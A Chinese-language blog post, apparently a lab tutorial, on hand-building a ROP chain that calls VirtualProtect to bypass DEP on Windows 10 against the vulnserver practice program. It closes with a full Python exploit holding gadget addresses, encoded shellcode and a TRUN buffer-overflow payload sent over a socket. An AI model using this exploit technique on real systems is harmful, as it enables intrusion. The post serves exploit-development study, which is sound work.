<!DOCTYPE html>
<html lang="">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,minimum-scale=1,maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="description" content="Windows 10 DEP Bypass (2)"/>








    <link rel="alternate" href="/default" title="Boxer">




    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.1"/>



<link rel="canonical" href="http://yoursite.com/2020/05/14/windows10-bypass-dep-2/"/>


<meta name="description" content="上一篇是通过 mona 自动生成的ROP链，但如果没弄懂原理，只会用工具，那显然人就凉了。 这篇文章我采用手工构造ROP。 有趣的是，在构造的过程中意外的理解了 mona 的 rop chain 原理。 环境操作系统：Windows 10 x64 (运行的是32位的程序)漏洞程序：vulnserver (国外研究员开发用来练习漏洞利用的程序) 绕过DEP的方法与上一篇不同，这次我使用 Virtua">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows 10 DEP Bypass (2)">
<meta property="og:url" content="http://yoursite.com/2020/05/14/windows10-bypass-dep-2/index.html">
<meta property="og:site_name" content="Boxer">
<meta property="og:description" content="上一篇是通过 mona 自动生成的ROP链，但如果没弄懂原理，只会用工具，那显然人就凉了。 这篇文章我采用手工构造ROP。 有趣的是，在构造的过程中意外的理解了 mona 的 rop chain 原理。 环境操作系统：Windows 10 x64 (运行的是32位的程序)漏洞程序：vulnserver (国外研究员开发用来练习漏洞利用的程序) 绕过DEP的方法与上一篇不同，这次我使用 Virtua">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/image/15894401443426.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894421022211.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894405230031.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894408722231.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894413018376.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894417443227.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894398254108.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894435301861.jpg">
<meta property="og:image" content="http://yoursite.com/image/15894439691582.jpg">
<meta property="article:published_time" content="2020-05-14T06:34:13.175Z">
<meta property="article:modified_time" content="2020-05-14T08:22:30.843Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/image/15894401443426.jpg">


<link rel="stylesheet" type="text/css" href="/css/style.css?v=1.1"/>
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet'>





<script type="text/javascript">
  var themeConfig = {
    fancybox: {
      enable: false
    },
  };
</script>




    





    





    <title> Windows 10 DEP Bypass (2) - Boxer </title>
  <meta name="generator" content="Hexo 4.2.0"></head>

  <body>
    <div id="page">
      <header id="masthead"><div class="site-header-inner">
    <h1 class="site-title">
        <a href="/." class="logo">Boxer</a>
    </h1>

    <nav id="nav-top">
        
            <ul id="menu-top" class="nav-top-items">
                
                    <li class="menu-item">
                        <a href="https://github.com/songjianyang" target="_blank" rel="noopener">
                            
                            
                                Github
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/Links">
                            
                            
                                Links
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/about">
                            
                            
                                About
                            
                        </a>
                    </li>
                
                
            </ul>
        
    </nav>

</div>

      </header>
      <div id="content">
        
    <div id="primary">
        
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          Windows 10 DEP Bypass (2)
        
      </h1>

      <time class="post-time">
          2020-05-14
      </time>
    </header>



    
            <div class="post-content">
            <p>上一篇是通过 mona 自动生成的ROP链，但如果没弄懂原理，只会用工具，那显然人就凉了。</p>
<p>这篇文章我采用手工构造ROP。 有趣的是，在构造的过程中意外的理解了 mona 的 rop chain 原理。</p>
<h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h3><p>操作系统：Windows 10 x64 (运行的是32位的程序)<br>漏洞程序：<a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">vulnserver</a> (国外研究员开发用来练习漏洞利用的程序)</p>
<h3 id="绕过DEP的方法"><a href="#绕过DEP的方法" class="headerlink" title="绕过DEP的方法"></a>绕过DEP的方法</h3><p>与上一篇不同，这次我使用 VirtualProtect 函数。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">VirtualProtect</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">    LPVOID lpAddress, <span class="comment">// 目标地址起始位置(一般是shellcode的起始地址)</span></span></span></span><br><span class="line"><span class="function"><span class="params">    DWORD dwSize, <span class="comment">// 大小 (修改属性的范围多大)</span></span></span></span><br><span class="line"><span class="function"><span class="params">    DWORD flNewProtect, <span class="comment">// 请求的保护方式  （保护属性）</span></span></span></span><br><span class="line"><span class="function"><span class="params">    PDWORD lpflOldProtect <span class="comment">// 保存老的保护方式 （随便一个可写的地址）</span></span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span>;</span><br></pre></td></tr></table></figure>

<p>该函数用于修改一个区域的保护属性，可以将受到DEP保护的区域改成可执行区域。所以我们可以将shellcode布置到栈上，然后调用该函数将栈的属性改为可执行。</p>
<p>关于 flNewProtect 参数，我们可以修改如下几个值。<br>我们使用0x40即可，将区域改成可读可写可执行（PAGE_EXECUTE_READ)。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Protection flags:</span><br><span class="line">    PAGE_EXECUTE &#x3D; 0x10</span><br><span class="line">    PAGE_EXECUTE_READ &#x3D; 0x20</span><br><span class="line">    PAGE_EXECUTE_READWRITE &#x3D; 0x40</span><br><span class="line">    PAGE_EXECUTE_WRITECOPY &#x3D; 0x80</span><br><span class="line">    PAGE_NOACCESS &#x3D; 0x01</span><br><span class="line">    PAGE_READONLY &#x3D; 0x02</span><br><span class="line">    PAGE_READWRITE &#x3D; 0x04</span><br><span class="line">    PAGE_WRITECOPY &#x3D; 0x08</span><br></pre></td></tr></table></figure>

<h3 id="构造rop-chain"><a href="#构造rop-chain" class="headerlink" title="构造rop chain"></a>构造rop chain</h3><p>第一步，我们先来找 VirtualProtect 的调用，可以使用x64dbg（x32dbg），非常方便。</p>
<p><img src="/image/15894401443426.jpg" alt=""></p>
<p>搜索VirtualProtect，找到了好几条调用，逐个观察找一个合适的。</p>
<p><img src="/image/15894421022211.jpg" alt=""></p>
<p>选择一个调用，然后一步一步跟随指针找到最终的 VirtualProtect。<br><img src="/image/15894405230031.jpg" alt=""></p>
<p>这里我选择 0x7680ea26 用来构造ROP，为啥要有加一个push ecx呢？因为要用来平衡栈。<br><img src="/image/15894408722231.jpg" alt=""></p>
<p>这里一系列push、mov来操作ebp，都是为了获取参数中的值。具体我就不分析每个指令对应哪个值了，直接给出答案。<br><img src="/image/15894413018376.jpg" alt=""></p>
<p>在执行到<code>7680EA27 mov eax,dword ptr ss:[ebp+c]</code>这条指令时，对应栈区要有如下布局：<br><img src="/image/15894417443227.jpg" alt=""></p>
<p>最终要的是这两行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0336f9e8  00000040 000021c7 0336f9f0 0336fa08 →     (该函数的返回地址)</span><br><span class="line">0336f9f8  0336f9fc 00000291 00000040 0336fa00 </span><br><span class="line">            ↓         ↓        ↓        ↓</span><br><span class="line">    (shellcode地址)    (size）  (保护属性)  (随便一个可写地址）</span><br></pre></td></tr></table></figure>



<p>然后就可以开始构造参数了，起初我的想法是像《0day安全软件漏洞分析技术》里那样，将参数直接写在Payload里，然后再随便做做微调就行了。实施的时候才反应过来，漏洞函数是strcpy，也就意味着Payload里不能有0x00，但是我们的参数中又必须得用0x00，比如flNewProtect要写成0x00000040。而且，我的栈地址是随机的，也就是不能写固定的地址，必须通过ROP的方式动态的写。</p>
<p><img src="/image/15894398254108.jpg" alt=""></p>
<p>一条可行的方法，就是将参数先保存在寄存器里，最后逐个将寄存器push到栈上。但是用啥指令可以将寄存器的值push到栈中？ 第一直觉是使用 <code>push   r32 ; retn</code>，但这种指令不可用，因为retn到的是你push的内容。</p>
<p>然后再想，可以找一条连续push的指令 <code>push eax ; push ebx; push ecx; push edx ; retn</code>，但很遗憾，没有找到这样的指令。然后Google一下，这时我才明白 mona 为什么要用 <code>pushad</code> 这条指令，原来它的作用就是将r32寄存器全部一次性入栈。</p>
<p>根据我的测试，它的入栈顺序是这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">push eax  (lpflOldProtect，任意可写地址)</span><br><span class="line">push ecx  (保护属性，0x40）</span><br><span class="line">push edx  (size)</span><br><span class="line">push ebx  (shellcode起始地址)</span><br><span class="line">push esp  (返回地址)</span><br><span class="line">push ebp  (指向返回地址-4的位置)</span><br><span class="line">push esi</span><br><span class="line">push edi</span><br></pre></td></tr></table></figure>

<p>接下来思路就明晰了，这些寄存器对应着我们的参数布局，只要通过rop指令将寄存器设置成恰当的值即可。有趣的是，恰好esp对应的是返回地址，这样等VirtualProtect 函数返回时，将直接返回到栈上执行我们的shellcode。</p>
<p>这里要注意的是ebp的值，它需要指向返回地址-4的地方，这样才能正常的获取到参数。</p>
<p><img src="/image/15894435301861.jpg" alt=""></p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">host = <span class="string">'127.0.0.1'</span></span><br><span class="line">port = <span class="number">6666</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line">    rop_gadgets = [</span><br><span class="line">        <span class="comment">#edi，pushad后的返回地址，即VirtualProtect</span></span><br><span class="line">        <span class="number">0x74E18A41</span>, <span class="comment"># pop edi ; retn</span></span><br><span class="line">        <span class="number">0x7680ea26</span>, <span class="comment"># VirtualProtect</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">#ecx，保护属性0x40，没找到合适的指令，只好[add eax,10]* 4了</span></span><br><span class="line">        <span class="number">0x770D708F</span>, <span class="comment"># xor eax,eax ; retn</span></span><br><span class="line">        <span class="number">0x76ED36F5</span>, <span class="comment"># add eax,10 ; retn</span></span><br><span class="line">        <span class="number">0x76ED36F5</span>, <span class="comment"># add eax,10 ; retn</span></span><br><span class="line">        <span class="number">0x76ED36F5</span>, <span class="comment"># add eax,10 ; retn</span></span><br><span class="line">        <span class="number">0x76ED36F5</span>, <span class="comment"># add eax,10 ; retn</span></span><br><span class="line">        <span class="number">0x77211F4D</span>, <span class="comment"># xchg eax,ecx ; retn</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">#edx，size </span></span><br><span class="line">        <span class="number">0x74e049f2</span>, <span class="comment"># mov eax,291 ; retn</span></span><br><span class="line">        <span class="number">0x76F13E4F</span>, <span class="comment"># xchg eax,edx ; retn</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># ebp，在恰当的位置设置ebp</span></span><br><span class="line">        <span class="number">0x77251BF4</span>, <span class="comment"># push esp ; pop ebp ; retn 0x8</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># ebx，起始地址。</span></span><br><span class="line">        <span class="number">0x765BF031</span>, <span class="comment"># push esp ; pop ebx ; retn</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">#padding</span></span><br><span class="line">        <span class="number">0x90909090</span>,</span><br><span class="line">        <span class="number">0x90909090</span>,</span><br><span class="line">        </span><br><span class="line">        <span class="comment">#eax，任意可写地址</span></span><br><span class="line">        <span class="number">0x76872EBF</span>, <span class="comment"># push esp ; pop esi ; retn  </span></span><br><span class="line">        <span class="number">0x76876802</span>, <span class="comment"># xchg eax,esi ; retn</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">#pushad</span></span><br><span class="line">        <span class="number">0x7714c5ee</span></span><br><span class="line">   ]</span><br><span class="line">    <span class="keyword">return</span> <span class="string">''</span>.join(struct.pack(<span class="string">'&lt;I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b"\xda\xdb\xbe\x7a\x98\xa7\x3b\xd9\x74\x24\xf4\x5f\x29"</span></span><br><span class="line">shellcode += <span class="string">b"\xc9\xb1\x31\x31\x77\x18\x83\xef\xfc\x03\x77\x6e\x7a"</span></span><br><span class="line">shellcode += <span class="string">b"\x52\xc7\x66\xf8\x9d\x38\x76\x9d\x14\xdd\x47\x9d\x43"</span></span><br><span class="line">shellcode += <span class="string">b"\x95\xf7\x2d\x07\xfb\xfb\xc6\x45\xe8\x88\xab\x41\x1f"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x01\xb4\x2e\xba\x3a\x84\x31\x38\x41\xd9\x91\x01"</span></span><br><span class="line">shellcode += <span class="string">b"\x8a\x2c\xd3\x46\xf7\xdd\x81\x1f\x73\x73\x36\x14\xc9"</span></span><br><span class="line">shellcode += <span class="string">b"\x48\xbd\x66\xdf\xc8\x22\x3e\xde\xf9\xf4\x35\xb9\xd9"</span></span><br><span class="line">shellcode += <span class="string">b"\xf7\x9a\xb1\x53\xe0\xff\xfc\x2a\x9b\xcb\x8b\xac\x4d"</span></span><br><span class="line">shellcode += <span class="string">b"\x02\x73\x02\xb0\xab\x86\x5a\xf4\x0b\x79\x29\x0c\x68"</span></span><br><span class="line">shellcode += <span class="string">b"\x04\x2a\xcb\x13\xd2\xbf\xc8\xb3\x91\x18\x35\x42\x75"</span></span><br><span class="line">shellcode += <span class="string">b"\xfe\xbe\x48\x32\x74\x98\x4c\xc5\x59\x92\x68\x4e\x5c"</span></span><br><span class="line">shellcode += <span class="string">b"\x75\xf9\x14\x7b\x51\xa2\xcf\xe2\xc0\x0e\xa1\x1b\x12"</span></span><br><span class="line">shellcode += <span class="string">b"\xf1\x1e\xbe\x58\x1f\x4a\xb3\x02\x75\x8d\x41\x39\x3b"</span></span><br><span class="line">shellcode += <span class="string">b"\x8d\x59\x42\x6b\xe6\x68\xc9\xe4\x71\x75\x18\x41\x8d"</span></span><br><span class="line">shellcode += <span class="string">b"\x3f\x01\xe3\x06\xe6\xd3\xb6\x4a\x19\x0e\xf4\x72\x9a"</span></span><br><span class="line">shellcode += <span class="string">b"\xbb\x84\x80\x82\xc9\x81\xcd\x04\x21\xfb\x5e\xe1\x45"</span></span><br><span class="line">shellcode += <span class="string">b"\xa8\x5f\x20\x26\x2f\xcc\xa8\x87\xca\x74\x4a\xd8"</span></span><br><span class="line"></span><br><span class="line">payload =  <span class="string">'TRUN .'</span></span><br><span class="line">payload += <span class="string">'A'</span> * <span class="number">2006</span></span><br><span class="line">payload += rop_chain</span><br><span class="line">payload += <span class="string">"\x90"</span> * <span class="number">6</span></span><br><span class="line">payload += shellcode</span><br><span class="line">payload += <span class="string">'C'</span>* len(payload)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    s.connect((host, port))</span><br><span class="line">    s.recv(<span class="number">1024</span>)</span><br><span class="line">    s.send(payload)</span><br><span class="line">    s.close()</span><br><span class="line">    </span><br><span class="line"><span class="keyword">except</span> Exception, e:</span><br><span class="line">    <span class="keyword">print</span> e</span><br></pre></td></tr></table></figure>


<p><img src="/image/15894439691582.jpg" alt=""></p>

            </div>
          

    
  </article>

    </div>

      </div>

      <footer id="colophon"><span class="copyright-year">
    
        &copy;
    
        2012 -
    
    2020
    <span class="footer-author">.</span>
    <span class="power-by">
        Powered by <a class="hexo-link" href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> and <a class="theme-link" href="https://github.com/henryhuang/hexo-theme-polarbearsimple" target="_blank" rel="noopener">Polar Bear Simple</a>
    </span>
</span>

      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>
    


    


    




  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  

    <script type="text/javascript" src="/js/src/theme.js?v=1.1"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=1.1"></script>

    

  
 
  </script>
  </body>
</html>
